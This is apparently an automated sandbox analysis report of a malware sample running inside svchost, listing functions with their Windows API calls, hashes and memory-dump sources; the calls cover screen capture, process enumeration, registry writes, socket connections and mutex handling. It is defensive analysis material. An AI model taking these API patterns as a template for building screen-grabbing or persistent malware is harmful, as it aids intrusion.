                                                                                                                                                                                                              • API String ID: 3783495248-0
                                                                                                                                                                                                              • Opcode ID: e8a1fca5e21c69c459a310fe7ebf9e1317214f079c7aff008e09d72061867bbd
                                                                                                                                                                                                              • Instruction ID: fb874e09bc3eed5408295957545ed8cdd128c048eda58bdf2fdbcafa50bc8fcd
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e8a1fca5e21c69c459a310fe7ebf9e1317214f079c7aff008e09d72061867bbd
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0B518C32A45280EAEF21CB2DE84CBA57FD49B86328F08468ED8C1CF2D2C3756655D790
                                                                                                                                                                                                              Function 02C9CA90 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 126windowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • IsWindowVisible.USER32(02C9D21D), ref: 02C9CAAF
                                                                                                                                                                                                              • GetWindowInfo.USER32(02C9D21D,?), ref: 02C9CAC9
                                                                                                                                                                                                              • GetClassLongA.USER32(02C9D21D,000000E6), ref: 02C9CB1E
                                                                                                                                                                                                              • PrintWindow.USER32(02C9D21D,?,00000000), ref: 02C9CB37
                                                                                                                                                                                                              • BitBlt.GDI32(02C9CD02,?,?,?,?,75C0BCB0,00000000,00000000,00CC0020), ref: 02C9CBDE
                                                                                                                                                                                                                • Part of subcall function 02C9DCE0: GetClassNameA.USER32(?,?,00000101), ref: 02C9DCF6
                                                                                                                                                                                                                • Part of subcall function 02C9C8D0: SendMessageA.USER32(00000000,?,00000004,00000000), ref: 02C9C8F8
                                                                                                                                                                                                                • Part of subcall function 02C9C8D0: GdiFlush.GDI32(00000000,?,02C9C9F1,00000000,?), ref: 02C9C90E
                                                                                                                                                                                                                • Part of subcall function 02C9C8D0: BitBlt.GDI32(02C9C9F1,00000000,00000000,?,02C9C9F1,?,00000000,00000000,00CC0020), ref: 02C9C934
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$Class$FlushInfoLongMessageNamePrintSendVisible
                                                                                                                                                                                                              • String ID: <
                                                                                                                                                                                                              • API String ID: 2334662925-4251816714
                                                                                                                                                                                                              • Opcode ID: e11ebe062a91a4ebc7f99dfa621c88f009f49ee1ff64aa893799b69ca797b583
                                                                                                                                                                                                              • Instruction ID: 90eb79c1752f06f1c71ca9a62c59d820f1a098f82cd68b86f93655d9fdcf69bb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e11ebe062a91a4ebc7f99dfa621c88f009f49ee1ff64aa893799b69ca797b583
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A8414B71E01519AFCF14CF98C988AADFBBABF88354B55425AE409E3640D730BA51CBA0
                                                                                                                                                                                                              Function 02C95A20 Relevance: 10.6, APIs: 7, Instructions: 110synchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C95A60
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C95A8C
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C95AB3
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02C95AD4
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(000003DC,000003E8), ref: 02C95B04
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(000003DC), ref: 02C95B25
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 02C95B3E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2971961948-0
                                                                                                                                                                                                              • Opcode ID: 5bb0fec57580fe785a933d625774b00d663f97234ed69420fb88c0558c23b699
                                                                                                                                                                                                              • Instruction ID: 19176d206967a3269cc176d67a28614714d9d66548c89688032f37eff7fecc86
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5bb0fec57580fe785a933d625774b00d663f97234ed69420fb88c0558c23b699
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EF41D6B5D41208AFDB41DFA9D884AEDBBF5FB88351F94416AE904F7240E7709A01CB94
                                                                                                                                                                                                              Function 02C95B50 Relevance: 10.6, APIs: 7, Instructions: 97synchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 02C95B68
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C95B99
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C95BC5
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C95BEC
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(000003DC,000003E8), ref: 02C95C1D
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(000003DC), ref: 02C95C3E
                                                                                                                                                                                                              • SetLastError.KERNEL32(?), ref: 02C95C48
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$ErrorLast$MutexObjectReleaseSingleWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2971961948-0
                                                                                                                                                                                                              • Opcode ID: efb672c91f138c0404e67dc2330e628e0d86272658878ff2b90a61beec732605
                                                                                                                                                                                                              • Instruction ID: 177a049c1113142f8abfcb51edff1f05432624a2447f90e9dd53c0e83a282494
                                                                                                                                                                                                              • Opcode Fuzzy Hash: efb672c91f138c0404e67dc2330e628e0d86272658878ff2b90a61beec732605
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E931D4B1E41218AFDB40DFA8D884ADDBBF5FB48751F50856AE518E7240E7709901CF90
                                                                                                                                                                                                              Function 02C9BB50 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 92stringCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C9BB8F
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C9BBBB
                                                                                                                                                                                                              • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02C9BBE2
                                                                                                                                                                                                              • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 02C9BC11
                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,5dd2ba1da), ref: 02C9BC27
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: QueryVirtual$InformationObjectUserlstrcmpi
                                                                                                                                                                                                              • String ID: 5dd2ba1da
                                                                                                                                                                                                              • API String ID: 410342393-2661299619
                                                                                                                                                                                                              • Opcode ID: 3f7320346819307b5694432c2ec1757bf1e6ada148bf2f84dc39780366657113
                                                                                                                                                                                                              • Instruction ID: 8ca4db6669d671ba1afd42c95e380e63a3fd2f9172a36fd67efc8e28c7e8745b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3f7320346819307b5694432c2ec1757bf1e6ada148bf2f84dc39780366657113
                                                                                                                                                                                                              • Instruction Fuzzy Hash: A831C6B1E4020DAFDB40DFA9D885AEEBBB8FB48705F50816AE508E7240E7745A45CF90
                                                                                                                                                                                                              Function 004015A0 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 004015C4
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004015CF
                                                                                                                                                                                                              • Process32First.KERNEL32 ref: 004015F5
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,?), ref: 00401610
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 0040161C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401638
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040164A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3955875343-0
                                                                                                                                                                                                              • Opcode ID: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                              • Instruction ID: d18670d365493a771e2935c97cc000c5a2e18494483a7794571357713e5f98ef
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1da21db6c4adfa57a29160c47196a4ddbfb2d91636da1a720539600d1335a6ad
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4111C6B25043106BD310EF55DC4899BBBD8EBE9361F04453AFA55A3290E335D9448BEA
                                                                                                                                                                                                              Function 02CB4BF0 Relevance: 10.6, APIs: 7, Instructions: 72processCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 02CB4C14
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02CB4C1F
                                                                                                                                                                                                              • Process32First.KERNEL32 ref: 02CB4C45
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,?), ref: 02CB4C60
                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,?), ref: 02CB4C6C
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02CB4C88
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB4C9A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3955875343-0
                                                                                                                                                                                                              • Opcode ID: 3420f6471de08dc8f23dbecfbb690c534cc33a34f48d74e93801e7712bde6a95
                                                                                                                                                                                                              • Instruction ID: 9d70109754f2d20d0f472635b32ba7e1167966ea88cc79f90a1f88d63661ba75
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3420f6471de08dc8f23dbecfbb690c534cc33a34f48d74e93801e7712bde6a95
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0211A17290A6105BD220DE65DC08A9BBBA8EFC57A1F404A1AFE54C2181E33096198BE2
                                                                                                                                                                                                              Function 02CA1846 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 59registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,-80000001,?,?,?,?,?,?,0000001C,00000000), ref: 02CA18AD
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(-80000001,5DD2BFFFa,00000000,00000001,?,00000104,?,?,?,?,0000001C,00000000), ref: 02CA18CF
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 02CA18DD
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 02CA18F0
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseFlushOpenValue
                                                                                                                                                                                                              • String ID: 5DD2BFFFa$software\microsoft
                                                                                                                                                                                                              • API String ID: 2510291871-1795079277
                                                                                                                                                                                                              • Opcode ID: 458b294628b8823240a52b6899df22e649e09eb670aa798e1cd20681940d09f2
                                                                                                                                                                                                              • Instruction ID: 51334f0c158d7923856b9aedb6ab1faa1dacad666587b4a33f06ba747196c486
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 458b294628b8823240a52b6899df22e649e09eb670aa798e1cd20681940d09f2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E211C170A01205ABEB14CB60D8D8BEE3379EF44748FA445A8E689D7140D6B0DA848B50
                                                                                                                                                                                                              Function 02CC12F0 Relevance: 10.6, APIs: 7, Instructions: 55networkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • htons.WS2_32(?), ref: 02CC1314
                                                                                                                                                                                                              • inet_addr.WS2_32(?), ref: 02CC131F
                                                                                                                                                                                                              • htonl.WS2_32(000000FF), ref: 02CC132A
                                                                                                                                                                                                              • gethostbyname.WS2_32(?), ref: 02CC1336
                                                                                                                                                                                                              • socket.WS2_32(00000002,00000001,00000000), ref: 02CC1350
                                                                                                                                                                                                              • connect.WS2_32(00000000,?,00000010), ref: 02CC1363
                                                                                                                                                                                                              • closesocket.WS2_32(00000000), ref: 02CC136E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: closesocketconnectgethostbynamehtonlhtonsinet_addrsocket
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 298246419-0
                                                                                                                                                                                                              • Opcode ID: 7154baccdcf98fe22c96598bd6afe0d83c4a9d433766cedeef78e01b4488cdec
                                                                                                                                                                                                              • Instruction ID: 1ffc13e5c5417224e170ef0242d00efeb6f9082d14427869e143a7aa532ad836
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7154baccdcf98fe22c96598bd6afe0d83c4a9d433766cedeef78e01b4488cdec
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C111A030E01204AFDB00ABB5D848B9AB769FF45391F848759F515D7291E7B095108B50
                                                                                                                                                                                                              Function 02C9D890 Relevance: 10.6, APIs: 7, Instructions: 53synchronizationthreadwindowCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,02C9D860,00000000,00000000,00000000), ref: 02C9D8A4
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000,?,?,02C99D7A,?,?,?,?,02C99F49,00000000,?,?,?,?,02C99400), ref: 02C9D8BC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,02C99D7A,?,?,?,?,02C99F49,00000000,?,?,?,?,02C99400,?), ref: 02C9D8CD
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,02C99D7A,?,?,?,?,02C99F49,00000000,?,?,?,?,02C99400), ref: 02C9D8DC
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02C9D910
                                                                                                                                                                                                              • IsWindow.USER32(?), ref: 02C9D917
                                                                                                                                                                                                              • PostMessageA.USER32(?,00000215,00000000,00000000), ref: 02C9D92B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$CloseCreateInformationMessageMutexObjectPostReleaseSingleThreadWaitWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 731183410-0
                                                                                                                                                                                                              • Opcode ID: 5feb80f60abb2630332b7ee95ff014e5bb556952067b6ed5b2c859aefeef2f49
                                                                                                                                                                                                              • Instruction ID: 67d344e076e742d7bb1ecfdc5c611dbe7ec3e7a87eb847685e4e2172a9147c62
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5feb80f60abb2630332b7ee95ff014e5bb556952067b6ed5b2c859aefeef2f49
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A11C430A82314BBE710AF64DC0DFAA77E8AF05B55F5446A4F906FB2C1D7B066108BD8
                                                                                                                                                                                                              Function 004034C0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                              • GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              • \\?\globalroot\systemroot\system32\tasks\, xrefs: 004034C9
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2972647321.0000000000400000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2972647321.000000000045E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
                                                                                                                                                                                                              • String ID: \\?\globalroot\systemroot\system32\tasks\
                                                                                                                                                                                                              • API String ID: 4133869067-1576788796
                                                                                                                                                                                                              • Opcode ID: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                              • Instruction ID: a2ec502b7bb4083542b5d35a97e2222aece09e1ccb5a5fef7106c32bda11fc1e
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cd9cee1f28ce7391e7550083cfa8bb7bde7286681f103bbdee0c8fcbe7e62476
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 150165B5A00218FBEB24DFA0DD48F9A7BBCAB44B06F0080A5E609B2191D6749B44DF65
                                                                                                                                                                                                              Function 02CA98F0 Relevance: 10.5, APIs: 7, Instructions: 43networkthreadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • shutdown.WS2_32(?,00000001), ref: 02CA990B
                                                                                                                                                                                                              • shutdown.WS2_32(02CA99EC,00000001), ref: 02CA9910
                                                                                                                                                                                                              • recv.WS2_32(02CA99EC,?,00000400,00000000), ref: 02CA992F
                                                                                                                                                                                                              • recv.WS2_32(?,?,00000400,00000000), ref: 02CA9945
                                                                                                                                                                                                              • closesocket.WS2_32(?), ref: 02CA9959
                                                                                                                                                                                                              • closesocket.WS2_32(02CA99EC), ref: 02CA995C
                                                                                                                                                                                                              • ExitThread.KERNEL32 ref: 02CA9960
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: closesocketrecvshutdown$ExitThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1638183600-0
                                                                                                                                                                                                              • Opcode ID: 02c38711a03609352bb23ab7e39dafdac265a2f8fb6b09c4451cbdf42ec379b0
                                                                                                                                                                                                              • Instruction ID: 24e66987d5bef744a563487469c4af7e197720c0cc8abf59f677ba0a9a95b128
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 02c38711a03609352bb23ab7e39dafdac265a2f8fb6b09c4451cbdf42ec379b0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BDF044B29503187BD7209A75CC46F9B3B6DEB48794F404544BB08BB180E6B4B940CEE4
                                                                                                                                                                                                              Function 02C938A0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 35registryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft,00000000,00000102,?,?,?,02C93B25,?), ref: 02C938C0
                                                                                                                                                                                                              • RegSetValueExA.ADVAPI32(00000000,5dd2bf87a,00000000,00000004,?,00000004,?,?,02C93B25,?), ref: 02C938DC
                                                                                                                                                                                                              • RegFlushKey.ADVAPI32(00000000,?,?,02C93B25,?), ref: 02C938EA
                                                                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,02C93B25,?), ref: 02C938F8
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CEE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_2c90000_svchost.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseFlushOpenValue
                                                                                                                                                                                                              • String ID: 5dd2bf87a$software\microsoft
                                                                                                                                                                                                              • API String ID: 2510291871-846386698
                                                                                                                                                                                                              • Opcode ID: 725cb29cda2f927d48bd8be0dd0e152e3258ffdd90cc0f8a9a32fe566d10981d
                                                                                                                                                                                                              • Instruction ID: 929ec38709ce5be117952ee1044e2a5bc8dfd8a8859c0c06aa296bfb2df85a51
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 725cb29cda2f927d48bd8be0dd0e152e3258ffdd90cc0f8a9a32fe566d10981d
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62F01DB5B41308BBFB10CB91CD4AFAA777CAB04B85F904555BA01E6140D770AA1096E4
                                                                                                                                                                                                              Function 02CB1930 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 34synchronizationsleepCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02CB193E
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02CB59EE
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02C95DE8,?,?,02C95DE8,?,00000001), ref: 02CB5A0B
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: SetNamedSecurityInfoA.ADVAPI32(?,02C95DE8,00000010,00000000,00000000,00000000,00000001), ref: 02CB5A26
                                                                                                                                                                                                                • Part of subcall function 02CB59D0: LocalFree.KERNEL32(?,?,?,02C95DE8,?,00000001), ref: 02CB5A37
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732},00000006), ref: 02CB195B
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000), ref: 02CB1962
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?), ref: 02CB1974
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 02CB1985
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.2976326837.0000000002C90000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.2976326837.0000000002CE9000.00000040.00001000.00020000.00000000.sdmpDownload File
